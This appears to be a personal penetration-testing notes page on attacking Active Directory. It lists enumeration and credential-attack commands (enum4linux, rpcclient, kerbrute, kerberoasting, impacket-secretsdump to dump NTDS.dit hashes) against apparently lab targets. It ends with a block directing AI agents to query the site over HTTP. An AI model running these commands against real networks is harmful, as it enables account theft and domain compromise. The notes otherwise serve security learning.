# Active Directory ## Attack Workflow Determine what ports are open Enumerate with * [ ] Determine open ports * [ ] Scan ports with Nmap to fingerprint * [ ] Enumerate AD information * [ ] Domain info * [ ] rpcclient * [ ] enum4linux * [ ] Get list of users * [ ] If list not available, bruteforce usernames * [ ] Determine if kerberos pre-auth exists * [ ] Determine which users have SPNs (Service Principle Names) ## enum4linux Used to enumerate a huge amount of AD information from the command line. ```bash enum4linux -a 10.1.1.10 # Attempts to enumerate everything at target enum4linux -u administrator -p password -U 10.1.1.10 # Use stolen creds to enumerate all users enum4linux -S 10.1.1.10 # Attempt to gather SMB shares ``` ## rpcclient Used to enumerate information about system over RPC Gather a list of accounts with `rpcclient` and save ``` rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt ``` ## Password Spraying Using a tool such as Talon can run password spray attacks across an AD env ## Kerberos Kerbrute, used to run various kerberos attacks. Written in Go. ```bash ./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt ``` ## Kerberoasting Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC. ## secretsdump Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions. ```bash impacket-secretsdump -just-dc backup:backup2517860@10.10.107.154 ``` ![AD Detailed Mind Map](/files/96MvNqmMQjK3F9ePVCK3) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.m4lwhere.org/offensive/microsoft-windows-exploits/active-directory.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.